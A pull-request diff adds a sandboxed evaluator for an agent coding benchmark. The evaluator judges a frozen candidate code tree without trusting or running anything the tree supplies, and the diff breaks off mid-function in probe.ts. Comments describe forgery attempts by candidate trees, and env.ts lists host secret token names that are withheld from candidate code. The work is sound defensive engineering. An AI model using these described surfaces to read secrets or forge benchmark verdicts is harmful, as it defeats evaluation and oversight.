### PR TITLE
Judge a candidate tree without trusting anything inside it

### DIFF
--- a/bench/cdeb/evaluator/engine.ts
+++ b/bench/cdeb/evaluator/engine.ts
@@ -1,0 +1,169 @@
+/**
+ * CDEB-06: the verdict engine — what the pinned image's entrypoint runs.
+ *
+ * The engine is the dual control's meeting point (PRD §4.7, §12): a task's
+ * sealed module supplies the functional checks and the decision oracle; the
+ * engine supplies everything about HOW they run — the read-only tree view,
+ * the probe executor, the counting, the refusal handling and the exact bytes
+ * of the output. Neither half alone can produce a verdict:
+ *
+ *   - the task module cannot see the candidate tree except through a TreeView
+ *     that is read-only and path-contained, and cannot run code except
+ *     through probes whose executable and flag allowlist the engine owns;
+ *   - the engine runs no candidate-owned command: no package-manager
+ *     script, no candidate test runner, no candidate config file and no
+ *     `.cdeb/oracles` is read anywhere in this module — §12.3 in code form.
+ *     A file in the tree that LOOKS like a
+ *     verdict (`evaluator.json`, `.cdeb/oracles/*`) is bytes on disk and
+ *     nothing more; no code path here parses it.
+ *
+ * Determinism, named source by source:
+ *
+ *   - clocks: the verdict carries no timestamp and no duration; the only
+ *     clock anywhere is a probe timeout, whose effect is the binary fact of
+ *     a kill;
+ *   - environment: nothing here reads process.env — the runner builds the
+ *     verdict process's environment from an allowlist (env.ts);
+ *   - filesystem order: every listing in TreeView is sorted;
+ *   - iteration order: the output object is constructed in frozen key order
+ *     and serialized with JSON.stringify, whose insertion order is specified;
+ *   - the tree itself: read-only on disk, so no check can observe another
+ *     check's side effects.
+ *
+ * Not closable here, stated plainly: candidate code a probe runs may itself
+ * be nondeterministic. A task whose probe expectations depend on such output
+ * is malformed and must not pass §4.8's oracle-determinism review; the
+ * controls (good/bad/no-op evaluated repeatedly) are the mechanical catch.
+ */
+
+import { existsSync, lstatSync, mkdirSync, readdirSync, readFileSync } from "node:fs";
+import { createHash } from "node:crypto";
+import { join, normalize, relative, sep } from "node:path";
+
+import { runProbe } from "./probe.ts";
+import type {
+  EvaluatorOutput,
+  FunctionalCheckResult,
+  IngestedTree,
+  ProbeResult,
+  ProbeSpec,
+  TaskEvaluator,
+  TreeView,
+} from "./types.ts";
+
+const sha256Hex = (input: string): string => createHash("sha256").update(input).digest("hex");
+
+/** Resolve a tree-relative path, or null when it escapes the root. */
+const contained = (root: string, path: string): string | null => {
+  const resolved = normalize(join(root, path));
+  const rel = relative(root, resolved);
+  if (rel === "" || rel.startsWith(`..${sep}`) || rel === "..") return null;
+  return resolved;
+};
+
+const treeView = (root: string): TreeView => ({
+  root,
+  exists(path: string): boolean {
+    const target = contained(root, path);
+    return target !== null && existsSync(target);
+  },
+  read(path: string): string | null {
+    const target = contained(root, path);
+    if (target === null || !existsSync(target)) return null;
+    const stat = lstatSync(target);
+    if (!stat.isFile()) return null;
+    return readFileSync(target, "utf8");
+  },
+  list(path: string): string[] {
+    const target = contained(root, path);
+    if (target === null || !existsSync(target)) return [];
+    const stat = lstatSync(target);
+    if (!stat.isDirectory()) return [];
+    return readdirSync(target).sort();
+  },
+  files(): string[] {
+    const found: string[] = [];
+    const walk = (dir: string, prefix: string): void => {
+      for (const name of readdirSync(dir).sort()) {
+        const abs = join(dir, name);
+        const rel = prefix === "" ? name : `${prefix}/${name}`;
+        const stat = lstatSync(abs);
+        if (stat.isDirectory()) walk(abs, rel);
+        else if (stat.isFile()) found.push(rel);
+      }
+    };
+    walk(root, "");
+    return found.sort();
+  },
+});
+
+/** A refusal becomes one failed functional check, so the counts stay honest. */
+const refusalChecks = (code: string, detail: string): FunctionalCheckResult[] => [
+  { name: `ingest-refused:${code}:${sha256Hex(detail).slice(0, 12)}`, passed: false },
+];
+
+export interface EvaluationInput {
+  readonly task: TaskEvaluator;
+  readonly tree: IngestedTree;
+  readonly scratchDir: string;
+  readonly evaluator_image_digest: string;
+}
+
+/**
+ * Runs one evaluation. Pure with respect to the verdict: same sealed task,
+ * same tree bytes, same output bytes — every time, on any machine.
+ */
+export const evaluateTask = (input: EvaluationInput): EvaluatorOutput => {
+  const { task, tree } = input;
+
+  let checks: readonly FunctionalCheckResult[];
+  if (tree.refusal !== null) {
+    checks = refusalChecks(tree.refusal.code, tree.refusal.detail);
+  } else {
+    const view = treeView(tree.root);
+    const probe = (spec: ProbeSpec): ProbeResult =>
+      runProbe(spec, { treeRoot: tree.root, scratchDir: input.scratchDir });
+    checks = task.functional_checks(view, probe);
+  }
+
+  const passed = checks.filter((check) => check.passed).length;
+  const failed = checks.length - passed;
+  // A task with zero checks certifies nothing; a refusal already failed.
+  const functional_pass = checks.length > 0 && failed === 0 && tree.refusal === null;
+
+  // The oracle is static — it reads bytes, never runs candidate code. A
+  // refused tree gets an EMPTY view: the extraction may be partial, and the
+  // oracle must not read half-extracted attack payloads. A REVIVED approach
+  // is judged REVIVED from the full tree or not at all.
+  let oracleView: TreeView;
+  if (tree.refusal === null) {
+    oracleView = treeView(tree.root);
+  } else {
+    const emptyRoot = join(input.scratchDir, "empty-tree");
+    mkdirSync(emptyRoot, { recursive: true });
+    oracleView = treeView(emptyRoot);
+  }
+  const oracleCode = task.decision_oracle(oracleView);
+
+  return {
+    schema_version: 1,
+    task_id: task.task_id,
+    functional_pass,
+    rejected_decision_revived: oracleCode === "REVIVED",
+    functional_checks: { passed, failed },
+    decision_oracle_code: oracleCode,
+    evaluator_image_digest: input.evaluator_image_digest,
+    candidate_tree_oid: tree.candidate_tree_oid,
+  };
+};
+
+/**
+ * Canonical serialization: key order is the schema's order by construction
+ * (evaluateTask builds the object in it), so these bytes are the normalized
+ * result the row's `normalized_result_sha256` commits to.
+ */
+export const canonicalResultBytes = (output: EvaluatorOutput): Buffer =>
+  Buffer.from(`${JSON.stringify(output)}\n`, "utf8");
+
+export const normalizedResultSha256 = (output: EvaluatorOutput): string =>
+  sha256Hex(canonicalResultBytes(output).toString("utf8"));

--- a/bench/cdeb/evaluator/entrypoint.ts
+++ b/bench/cdeb/evaluator/entrypoint.ts
@@ -1,0 +1,197 @@
+/**
+ * CDEB-06: the evaluator entrypoint — what `/cdeb/evaluate` runs inside the
+ * pinned image (PRD §12.1: `task_entrypoint: ["/cdeb/evaluate", "<task>"]`).
+ *
+ * Contract:
+ *
+ *   evaluate --tasks <sealed-task-dir> --task <task-id> --tree <archive>
+ *            [--claimed-oid <40-hex>] [--image-digest sha256:<64-hex>]
+ *
+ *   stdout: exactly the canonical verdict JSON (evaluator.schema.json) plus a
+ *   newline, and nothing else — no progress, no outcome commentary (§18.4's
+ *   no-peeking rule reaches the evaluator too).
+ *
+ *   exit 0: a verdict was produced (PASS or FAIL alike — a FAIL is a result,
+ *           not an error; §10.3 retries are for infrastructure failures).
+ *   exit 2: infrastructure failure — unreadable archive, unknown task,
+ *           malformed sealed module. The orchestrator retries the SAME tree
+ *           (§10.3); a persistent exit 2 leaves the matrix incomplete rather
+ *           than inventing a verdict.
+ *
+ * Trust boundaries enforced here:
+ *
+ *   - the sealed task directory must exist and must NOT be inside the
+ *     candidate tree (and the tree must not be inside it) — a tree mounted
+ *     as its own oracle source is the forgery this check exists to catch;
+ *   - the task module is loaded from the sealed directory only; its task_id
+ *     must equal the requested one;
+ *   - the archive is read, ingested through the hygiene gate, and its tree
+ *     OID recomputed; a claimed OID is compared, never adopted.
+ */
+
+import { existsSync, mkdtempSync, readFileSync, realpathSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join, relative, sep } from "node:path";
+import { pathToFileURL } from "node:url";
+
+import { ingestFinalTree } from "./ingest.ts";
+import { evaluateTask, canonicalResultBytes } from "./engine.ts";
+import type { EvaluatorOutput, TaskEvaluator } from "./types.ts";
+
+const USAGE = "evaluate --tasks <sealed-task-dir> --task <task-id> --tree <archive> [--claimed-oid <oid>] [--image-digest sha256:<hex>]";
+
+interface ParsedArgs {
+  tasksDir: string;
+  taskId: string;
+  treeArchive: string;
+  claimedOid?: string;
+  imageDigest: string;
+}
+
+const parseArgs = (argv: readonly string[]): ParsedArgs | string => {
+  let tasksDir = "";
+  let taskId = "";
+  let treeArchive = "";
+  let claimedOid: string | undefined;
+  let imageDigest = "";
+  for (let i = 0; i < argv.length; i += 1) {
+    const arg = argv[i]!;
+    const next = (): string => {
+      i += 1;
+      const value = argv[i];
+      if (value === undefined) throw new Error(`missing value for ${arg}`);
+      return value;
+    };
+    try {
+      if (arg === "--tasks") tasksDir = next();
+      else if (arg === "--task") taskId = next();
+      else if (arg === "--tree") treeArchive = next();
+      else if (arg === "--claimed-oid") claimedOid = next();
+      else if (arg === "--image-digest") imageDigest = next();
+      else return `unknown argument ${arg}`;
+    } catch (error) {
+      return (error as Error).message;
+    }
+  }
+  if (tasksDir === "" || taskId === "" || treeArchive === "") return USAGE;
+  if (claimedOid !== undefined && !/^[0-9a-f]{40}$/.test(claimedOid)) return "claimed-oid must be 40 lowercase hex chars";
+  return claimedOid === undefined
+    ? { tasksDir, taskId, treeArchive, imageDigest }
+    : { tasksDir, taskId, treeArchive, claimedOid, imageDigest };
+};
+
+const isWithin = (maybeChild: string, maybeParent: string): boolean => {
+  const rel = relative(maybeParent, maybeChild);
+  return rel === "" || (!rel.startsWith(`..${sep}`) && rel !== "..");
+};
+
+const looksLikeTask = (value: unknown): value is TaskEvaluator => {
+  if (typeof value !== "object" || value === null) return false;
+  const candidate = value as Record<string, unknown>;
+  return (
+    typeof candidate.task_id === "string" &&
+    Array.isArray(candidate.record_ids) &&
+    typeof candidate.functional_checks === "function" &&
+    typeof candidate.decision_oracle === "function"
+  );
+};
+
+export const main = async (argv: readonly string[]): Promise<number> => {
+  const parsed = parseArgs(argv);
+  if (typeof parsed === "string") {
+    process.stderr.write(`${parsed}\n`);
+    return 2;
+  }
+
+  if (!existsSync(parsed.tasksDir) || !existsSync(parsed.treeArchive)) {
+    process.stderr.write("evaluate: sealed task dir or tree archive missing\n");
+    return 2;
+  }
+
+  const tasksDir = realpathSync(parsed.tasksDir);
+  const scratch = mkdtempSync(join(tmpdir(), "cdeb-eval-"));
+
+  let archiveBytes: Buffer;
+  try {
+    archiveBytes = readFileSync(parsed.treeArchive);
+  } catch (error) {
+    process.stderr.write(`evaluate: cannot read archive: ${(error as Error).message}\n`);
+    return 2;
+  }
+
+  const tree = ingestFinalTree(
+    archiveBytes,
+    join(scratch, "ingest"),
+    parsed.claimedOid === undefined ? {} : { claimedOid: parsed.claimedOid },
+  );
+
+  // The sealed store and the candidate tree must be disjoint. Checked after
+  // extraction so the tree's real location is known.
+  if (tree.refusal === null) {
+    if (isWithin(tasksDir, tree.root) || isWithin(tree.root, tasksDir)) {
+      process.stderr.write("evaluate: sealed task store and candidate tree overlap — refusing\n");
+      return 2;
+    }
+  }
+
+  const modulePath = join(tasksDir, `${parsed.taskId}.task.ts`);
+  if (!existsSync(modulePath)) {
+    process.stderr.write(`evaluate: no sealed task module for ${parsed.taskId}\n`);
+    return 2;
+  }
+
+  let task: TaskEvaluator;
+  try {
+    const loaded = (await import(pathToFileURL(modulePath).href)) as { default?: unknown };
+    if (!looksLikeTask(loaded.default)) {
+      process.stderr.write(`evaluate: ${parsed.taskId}.task.ts does not export a TaskEvaluator\n`);
+      return 2;
+    }
+    task = loaded.default;
+  } catch (error) {
+    process.stderr.write(`evaluate: cannot load sealed task module: ${(error as Error).message}\n`);
+    return 2;
+  }
+  if (task.task_id !== parsed.taskId) {
+    process.stderr.write(`evaluate: module task_id ${task.task_id} does not match requested ${parsed.taskId}\n`);
+    return 2;
+  }
+
+  let output: EvaluatorOutput;
+  try {
+    output = evaluateTask({
+      task,
+      tree,
+      scratchDir: join(scratch, "engine"),
+      evaluator_image_digest: parsed.imageDigest,
+    });
+  } catch (error) {
+    // A sealed task that passed review should never throw; if one does, that
+    // is an infrastructure failure, and inventing a verdict would be worse.
+    process.stderr.write(`evaluate: engine failure: ${(error as Error).message}\n`);
+    return 2;
+  }
+
+  process.stdout.write(canonicalResultBytes(output));
+  return 0;
+};
+
+// Direct invocation (image entrypoint or local runner). Import-only use
+// (tests) never reaches this.
+const invokedDirectly = (() => {
+  try {
+    return process.argv[1] !== undefined && realpathSync(process.argv[1]) === realpathSync(new URL(import.meta.url).pathname);
+  } catch {
+    return false;
+  }
+})();
+
+if (invokedDirectly) {
+  main(process.argv.slice(2)).then(
+    (code) => process.exit(code),
+    (error) => {
+      process.stderr.write(`evaluate: fatal: ${(error as Error).message}\n`);
+      process.exit(2);
+    },
+  );
+}

--- a/bench/cdeb/evaluator/env.ts
+++ b/bench/cdeb/evaluator/env.ts
@@ -1,0 +1,55 @@
+/**
+ * CDEB-06: the hermetic environment every evaluator process and probe runs
+ * under (PRD §12.2 "deterministic locale/timezone", "no host HOME, no host
+ * secrets").
+ *
+ * The environment is an ALLOWLIST, built from scratch for each run:
+ *
+ *   - nothing from the host environment is inherited — a secret, a proxy, a
+ *     NODE_OPTIONS, a TZ set on the study machine never reaches the verdict;
+ *   - HOME and TMPDIR point inside the run's scratch, so `~/.ssh`,
+ *     `~/.aws` and friend do not exist as far as candidate code can see;
+ *   - TZ/LC_ALL/LANG are pinned so no locale or timezone can change what a
+ *     probe prints;
+ *   - the git config pointers stay at /dev/null so the staging in git-tree.ts
+ *     and any git a probe happens to run read no host configuration.
+ *
+ * What this cannot close on a bare host: kernel-level filesystem and network
+ * isolation. That is the OCI runner's job (runner-oci.ts: `--network none`,
+ * read-only mounts, no host HOME). The local runner documents itself as the
+ * qualification surface, not the study's containment.
+ */
+
+export interface HermeticEnvOptions {
+  /** Scratch directory that becomes HOME and TMPDIR for the run. */
+  readonly scratchDir: string;
+  /** Directory containing the node executable the probes may use. */
+  readonly nodeBinDir: string;
+}
+
+export const hermeticEnv = (options: HermeticEnvOptions): Record<string, string> => ({
+  PATH: `${options.nodeBinDir}:/usr/bin:/bin`,
+  HOME: options.scratchDir,
+  TMPDIR: options.scratchDir,
+  TZ: "UTC",
+  LC_ALL: "C",
+  LANG: "C",
+  GIT_CONFIG_GLOBAL: "/dev/null",
+  GIT_CONFIG_SYSTEM: "/dev/null",
+  GIT_TERMINAL_PROMPT: "0",
+  // Explicit empties beat absence: a probe checking `key in process.env`
+  // sees the same shape on every machine.
+  NODE_OPTIONS: "",
+  NODE_EXTRA_CA_CERTS: "",
+  http_proxy: "",
+  https_proxy: "",
+  HTTP_PROXY: "",
+  HTTPS_PROXY: "",
+  NO_PROXY: "",
+});
+
+/** Names the local runner strips and the OCI runner never mounts. */
+export const HOST_SECRETS_NEVER_PASSED = [
+  "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN", "GITHUB_TOKEN", "GH_TOKEN",
+  "NPM_TOKEN", "OPENAI_API_KEY", "ANTHROPIC_API_KEY", "DOCKER_HOST",
+] as const;

--- a/bench/cdeb/evaluator/freeze-tree.ts
+++ b/bench/cdeb/evaluator/freeze-tree.ts
@@ -1,0 +1,63 @@
+/**
+ * CDEB-06: canonical final-tree freeze (PRD §11.1), the freeze-side half of
+ * the evaluator pipeline.
+ *
+ * The agent's working tree becomes: a git tree OID (via the shared hermetic
+ * staging in git-tree.ts), and a deterministic archive of exactly the staged
+ * content — nothing else from the working directory enters the archive, so
+ * `node_modules`, build output and anything else the tree's `.gitignore`
+ * excludes stay out of the evaluated identity (§11.1 v1.2).
+ *
+ * Two digests are returned and both matter:
+ *
+ *   - `tar_sha256` — over the uncompressed deterministic tar bytes. This one
+ *     is stable across zstd builds and machines; it is the identity other
+ *     machines can recompute.
+ *   - `archive_zst_sha256` — over the `.tar.zst` artifact §19.1 stores,
+ *     compressed at the pinned level by the pinned node's bundled zstd.
+ *
+ * CDEB-07's freeze step records these in `final-tree.json` and writes
+ * `final-tree.tar.zst`; the evaluator then ingests the archive and RECOMPUTES
+ * the OID rather than trusting the claim (ingest.ts).
+ */
+
+import { writeFileSync } from "node:fs";
+import { join } from "node:path";
+
+import { entriesFromDirectory, renderArchive, compressZstd, sha256Hex } from "./tree.ts";
+import { stageAndWriteTree } from "./git-tree.ts";
+
+export interface FrozenFinalTree {
+  readonly final_tree_oid: string;
+  readonly tar_sha256: string;
+  readonly archive_zst_sha256: string;
+  /** The `.tar.zst` bytes §19.1 stores. */
+  readonly archive_zst: Buffer;
+  readonly staged_file_count: number;
+}
+
+/**
+ * Freezes the agent's final working tree. `scratchDir` must be a fresh
+ * directory the caller owns; nothing here writes inside `workdir`.
+ */
+export const freezeFinalTree = (workdir: string, scratchDir: string): FrozenFinalTree => {
+  const { treeOid, staged } = stageAndWriteTree(workdir, scratchDir);
+  const paths = staged.map((entry) => entry.path);
+  const entries = entriesFromDirectory(workdir, paths);
+  const tar = renderArchive(entries);
+  const zst = compressZstd(tar);
+  return {
+    final_tree_oid: treeOid,
+    tar_sha256: sha256Hex(tar),
+    archive_zst_sha256: sha256Hex(zst),
+    archive_zst: Buffer.from(zst),
+    staged_file_count: paths.length,
+  };
+};
+
+/** Writes the §19.1 artifacts (`final-tree.tar.zst`) under a run directory. */
+export const writeFrozenArtifacts = (runDir: string, frozen: FrozenFinalTree): string => {
+  const archivePath = join(runDir, "final-tree.tar.zst");
+  writeFileSync(archivePath, frozen.archive_zst);
+  return archivePath;
+};

--- a/bench/cdeb/evaluator/git-tree.ts
+++ b/bench/cdeb/evaluator/git-tree.ts
@@ -1,0 +1,112 @@
+/**
+ * CDEB-06: the ONE git staging implementation both sides of the final tree
+ * share (PRD §11.1).
+ *
+ * Freeze (§11.1, CDEB-07's call site) stages the agent's working tree and
+ * writes the tree OID; ingest (this ticket) re-stages the extracted archive
+ * and recomputes the OID. If those two staging paths ever diverge, the same
+ * tree gets two identities and every "evaluator tree == final tree" check
+ * becomes noise. So there is exactly one implementation, here, and both
+ * sides call it.
+ *
+ * Hermetic by construction, because the staging runs over a tree an UNTRUSTED
+ * author wrote:
+ *
+ *   - GIT_DIR is a fresh directory the evaluator owns — the candidate tree's
+ *     own `.git` (if smuggled) is never consulted; ingest refuses `.git`
+ *     entries before this runs anyway (tree.ts).
+ *   - GIT_CONFIG_GLOBAL/SYSTEM point at /dev/null — no host identity, no host
+ *     hooks, no host filters.
+ *   - core.fsmonitor=false — fsmonitor is a code-execution surface triggered
+ *     by `git add`; a candidate cannot supply the binary, but the flag makes
+ *     the refusal explicit rather than environmental.
+ *   - core.autocrlf=false, core.symlinks=true — fixed so the OID does not
+ *     depend on the machine's defaults; any `.gitattributes` EOL rules in the
+ *     tree apply identically on both sides because both sides are this code.
+ *   - the index file lives in the evaluator's git dir, never in the tree.
+ *
+ * Determinism: `git write-tree` hashes (path, mode, content) only — mtimes,
+ * enumeration order and host state do not reach the OID.
+ */
+
+import { mkdirSync, rmSync } from "node:fs";
+import { spawnSync } from "node:child_process";
+import { join } from "node:path";
+
+const HERMETIC_GIT_ENV: Readonly<Record<string, string>> = {
+  GIT_CONFIG_GLOBAL: "/dev/null",
+  GIT_CONFIG_SYSTEM: "/dev/null",
+  GIT_TERMINAL_PROMPT: "0",
+  GIT_ADVICE: "0",
+  GIT_OPTIONAL_LOCKS: "0",
+};
+
+const GIT_FLAGS = [
+  "-c", "core.fsmonitor=false",
+  "-c", "core.autocrlf=false",
+  "-c", "core.symlinks=true",
+  "-c", "core.ignorecase=false",
+  "-c", "core.fileMode=true",
+] as const;
+
+const runGit = (cwd: string, env: Record<string, string>, args: readonly string[]): string => {
+  const result = spawnSync("git", [...args], {
+    cwd,
+    env: { PATH: process.env.PATH ?? "/usr/bin:/bin", ...env },
+    encoding: "utf8",
+    maxBuffer: 64 * 1024 * 1024,
+  });
+  if (result.status !== 0) {
+    throw new Error(`git ${args.join(" ")} failed (${String(result.status)}): ${(result.stderr ?? "").trim()}`);
+  }
+  return result.stdout;
+};
+
+/** Staged entry listing: `mode oid stage\tpath`, the tree's own manifest. */
+export interface StagedEntry {
+  readonly mode: string;
+  readonly oid: string;
+  readonly path: string;
+}
+
+/**
+ * Stages everything under `workTree` into a fresh evaluator-owned index and
+ * returns the written tree OID plus the staged entry list.
+ *
+ * `git add -A` honours the tree's own `.gitignore` — the same rule the freeze
+ * applies (§11.1 v1.2), and the same rules re-apply on ingest because the
+ * archive carries the tree's `.gitignore` exactly as the agent left it.
+ */
+export const stageAndWriteTree = (workTree: string, scratchDir: string): { treeOid: string; staged: StagedEntry[] } => {
+  const gitDir = join(scratchDir, "eval-git-dir");
+  const indexFile = join(scratchDir, "eval-index");
+  mkdirSync(gitDir, { recursive: true });
+
+  const env: Record<string, string> = {
+    ...HERMETIC_GIT_ENV,
+    TMPDIR: scratchDir,
+    GIT_DIR: gitDir,
+    GIT_WORK_TREE: workTree,
+    GIT_INDEX_FILE: indexFile,
+  };
+
+  // init gets NO GIT_WORK_TREE: with an explicit directory argument git
+  // refuses the work-tree variable because the repository does not exist yet.
+  runGit(workTree, { ...HERMETIC_GIT_ENV, TMPDIR: scratchDir }, ["init", "--quiet", "--bare", gitDir]);
+  runGit(workTree, env, [...GIT_FLAGS, "add", "-A", "--", "."]);
+
+  const lsOut = runGit(workTree, env, ["ls-files", "-s", "-z"]);
+  const staged: StagedEntry[] = [];
+  for (const record of lsOut.split("\0")) {
+    if (record === "") continue;
+    const tab = record.indexOf("\t");
+    const meta = record.slice(0, tab).split(" ");
+    staged.push({ mode: meta[0] ?? "", oid: meta[1] ?? "", path: record.slice(tab + 1) });
+  }
+  staged.sort((a, b) => (a.path < b.path ? -1 : a.path > b.path ? 1 : 0));
+
+  const treeOid = runGit(workTree, env, [...GIT_FLAGS, "write-tree"]).trim();
+  rmSync(gitDir, { recursive: true, force: true });
+  rmSync(indexFile, { force: true });
+  return { treeOid, staged };
+};

--- a/bench/cdeb/evaluator/image/Dockerfile
+++ b/bench/cdeb/evaluator/image/Dockerfile
@@ -1,0 +1,35 @@
+# CDEB evaluator image (PRD §12.1).
+#
+# The base image is pinned by DIGEST at build time: resolve
+# `node:22-alpine` with `docker manifest inspect`, substitute the digest on
+# the FROM line, and record both in the freeze manifest. A tag-only FROM is
+# a protocol violation — the freeze gate refuses it (CDEB-11).
+#
+# The engine is copied from the pinned build context (runner-oci.ts's
+# ENGINE_CONTEXT_FILES, verified against evaluatorImageContextDigest()).
+# Nothing from the candidate tree ever enters this image, and the candidate
+# tree never enters this image at build time either: it is bind-mounted
+# read-only at /input at run time, by runner-oci.ts.
+#
+# Trust model inside the container: the entrypoint runs privileged (root
+# user of a caps-dropped, read-only, network-less container) because every
+# probe it spawns DROPS to uid/gid 65534 (probe.ts). /cdeb is root-owned and
+# unreadable by anyone else, so candidate code executing in a probe cannot
+# read the engine sources or the sealed task module — §12.3's hidden-path
+# prohibition, enforced by file modes instead of by hoping.
+#
+# No package manager runs here: the engine has zero dependencies beyond the
+# node runtime itself, which is exactly why — an `npm install` at image
+# build would be a network fetch whose contents the pin must then vouch for.
+FROM node:22-alpine
+
+ENV TZ=UTC LC_ALL=C LANG=C NODE_OPTIONS= HOME=/tmp
+
+WORKDIR /cdeb
+COPY engine/ /cdeb/engine/
+COPY cdeb-evaluate.sh /cdeb/evaluate
+RUN chmod 0555 /cdeb/evaluate \
+    && chmod -R go-rwx /cdeb \
+    && chmod -R a-w /cdeb
+
+ENTRYPOINT ["/cdeb/evaluate"]

--- a/bench/cdeb/evaluator/image/cdeb-evaluate.sh
+++ b/bench/cdeb/evaluator/image/cdeb-evaluate.sh
@@ -1,0 +1,5 @@
+#!/bin/sh
+# CDEB evaluator entrypoint wrapper (PRD §12.1 task_entrypoint shape).
+# Type-stripping runs the sealed engine sources directly — no build step
+# inside the image that a candidate tree could influence.
+exec node --experimental-strip-types /cdeb/engine/entrypoint.ts "$@"

--- a/bench/cdeb/evaluator/ingest.ts
+++ b/bench/cdeb/evaluator/ingest.ts
@@ -1,0 +1,102 @@
+/**
+ * CDEB-06: candidate tree ingestion — the evaluator side of the final tree
+ * (PRD §11.1 / §19.3).
+ *
+ * The archive is the ONLY input (§12.2). Ingestion:
+ *
+ *   1. decompresses (zstd magic sniffed; raw tar accepted),
+ *   2. extracts through the hygiene gate in tree.ts — traversal, `.git`
+ *      smuggling, escaping symlinks, hardlinks, device nodes and bombs are
+ *      all refused BEFORE the evaluator reads anything,
+ *   3. makes the extraction read-only,
+ *   4. recomputes the git tree OID with the SAME staging code the freeze
+ *      used (git-tree.ts) — the evaluator never trusts a claimed OID, it
+ *      re-derives it, and when the orchestrator supplies the freeze's claim
+ *      a mismatch is a refusal (§19.3: final tree/evaluator tree mismatch 금지).
+ *
+ * A refusal is not an infrastructure error. It is a candidate tree that the
+ * pinned harness cannot evaluate as a functional patch, and §13's
+ * intention-to-treat reads it as the agent's output: the engine turns every
+ * refusal into functional FAIL (engine.ts). The refusal code is named so a
+ * reviewer can tell a broken patch from an attack tree.
+ */
+
+import { chmodSync, readdirSync, statSync } from "node:fs";
+import { join } from "node:path";
+
+import { extractTreeArchive, maybeDecompress, sha256Hex } from "./tree.ts";
+import { stageAndWriteTree } from "./git-tree.ts";
+import type { IngestLimits, IngestedTree } from "./types.ts";
+import { DEFAULT_INGEST_LIMITS } from "./types.ts";
+
+const makeReadOnly = (dir: string): void => {
+  for (const name of readdirSync(dir).sort()) {
+    const path = join(dir, name);
+    const stat = statSync(path);
+    if (stat.isDirectory()) {
+      makeReadOnly(path);
+      chmodSync(path, 0o555);
+    } else if (stat.isSymbolicLink()) {
+      // symlinks carry no writable content; modes follow their targets
+    } else {
+      chmodSync(path, stat.mode & 0o111 ? 0o555 : 0o444);
+    }
+  }
+};
+
+export interface IngestOptions {
+  /** The freeze's claimed OID, when the orchestrator supplies it. */
+  readonly claimedOid?: string;
+  readonly limits?: IngestLimits;
+  /** Cap on the COMPRESSED archive bytes, before decompression. */
+  readonly maxArchiveBytes?: number;
+}
+
+export const DEFAULT_MAX_ARCHIVE_BYTES = 256 * 1024 * 1024;
+
+/**
+ * Materializes a candidate archive under `destRoot` (a fresh directory the
+ * caller owns) and recomputes its identity.
+ */
+export const ingestFinalTree = (
+  archiveBytes: Buffer,
+  destRoot: string,
+  options: IngestOptions = {},
+): IngestedTree => {
+  const limits = options.limits ?? DEFAULT_INGEST_LIMITS;
+  const treeRoot = join(destRoot, "tree");
+  if (archiveBytes.length > (options.maxArchiveBytes ?? DEFAULT_MAX_ARCHIVE_BYTES)) {
+    return {
+      root: treeRoot,
+      candidate_tree_oid: "0".repeat(40),
+      refusal: { code: "archive-too-large", detail: `archive is ${String(archiveBytes.length)} compressed bytes` },
+    };
+  }
+  const tar = maybeDecompress(archiveBytes);
+  const extraction = extractTreeArchive(tar, treeRoot, limits);
+
+  if (extraction.refusal !== null) {
+    return { root: treeRoot, candidate_tree_oid: "0".repeat(40), refusal: extraction.refusal };
+  }
+
+  makeReadOnly(treeRoot);
+
+  const stageScratch = join(destRoot, "stage");
+  const { treeOid } = stageAndWriteTree(treeRoot, stageScratch);
+
+  if (options.claimedOid !== undefined && options.claimedOid !== treeOid) {
+    return {
+      root: treeRoot,
+      candidate_tree_oid: treeOid,
+      refusal: {
+        code: "tree-oid-mismatch",
+        detail: `recomputed ${treeOid} does not match the freeze's claimed ${options.claimedOid}`,
+      },
+    };
+  }
+
+  return { root: treeRoot, candidate_tree_oid: treeOid, refusal: null };
+};
+
+/** Identity of the archive bytes themselves, for the row's final_tree block. */
+export const archiveDigest = (archiveBytes: Buffer): string => sha256Hex(archiveBytes);

--- a/bench/cdeb/evaluator/probe.ts
+++ b/bench/cdeb/evaluator/probe.ts
@@ -1,0 +1,135 @@
+/**
+ * CDEB-06: behavioral probes — the ONLY place candidate code executes, and
+ * only on the evaluator's terms (PRD §12.3).
+ *
+ * Authority split, enforced in code:
+ *
+ *   - the executable is the pinned node running the evaluator itself —
+ *     `process.execPath`, never a binary named by the tree;
+ *   - flags come from a frozen allowlist. Arbitrary node flags are a sandbox
+ *     surface: `--inspect` opens a network port, `--require`/`--import` load
+ *     code before the probe file, `--experimental-policy` changes what every
+ *     later process may do. `--experimental-strip-types` is the only one a
+ *     task needs (candidate sources in .ts), so it is the only one allowed;
+ *   - the arguments after the flags are the probe file (tree-relative) and
+ *     its inputs — stated by the sealed task module, not by the tree;
+ *   - the environment is the hermetic allowlist (env.ts); the probe inherits
+ *     nothing else;
+ *   - cwd is the read-only tree, so a probe can import tree-relative modules
+ *     but cannot mutate what later checks see;
+ *   - output is capped and a timeout kills the process: a probe is an
+ *     observation with a budget, not a tenant.
+ *
+ * The probe's stdout/stderr are DATA. Expectations are stated before the
+ * probe runs (expect_exit, expect_stdout) and compared mechanically — no
+ * verdict logic parses meaning out of what the candidate chose to print.
+ */
+
+import { spawnSync, type SpawnSyncOptions } from "node:child_process";
+import { dirname } from "node:path";
+
+import { hermeticEnv } from "./env.ts";
+import type { ProbeResult, ProbeSpec } from "./types.ts";
+
+export const DEFAULT_PROBE_TIMEOUT_MS = 10_000;
+export const MAX_PROBE_OUTPUT_BYTES = 1024 * 1024;
+
+/**
+ * Unprivileged id probes run under when the engine itself is privileged
+ * (the OCI container case). The sealed task store and the engine sources are
+ * readable only by the engine's user; dropping the probe's uid/gid is what
+ * keeps candidate code from reading the oracle it is being judged by —
+ * §12.3's "hidden evaluator path" prohibition, enforced per process.
+ */
+export const PROBE_UID = 65534;
+export const PROBE_GID = 65534;
+
+/**
+ * Frozen allowlist — see the module comment for why it is this short.
+ * `-e`/`--eval` are allowed because the evaluated string comes from the
+ * sealed task module (evaluator-owned), never from the tree.
+ */
+export const ALLOWED_NODE_FLAGS = ["--experimental-strip-types", "-e", "--eval"] as const;
+
+export interface ProbeContext {
+  /** Read-only extraction of the candidate tree; the probe's cwd. */
+  readonly treeRoot: string;
+  /** Scratch directory used as HOME/TMPDIR for the probe. */
+  readonly scratchDir: string;
+}
+
+export const runProbe = (spec: ProbeSpec, context: ProbeContext): ProbeResult => {
+  const argv = [...spec.argv];
+  const flags: string[] = [];
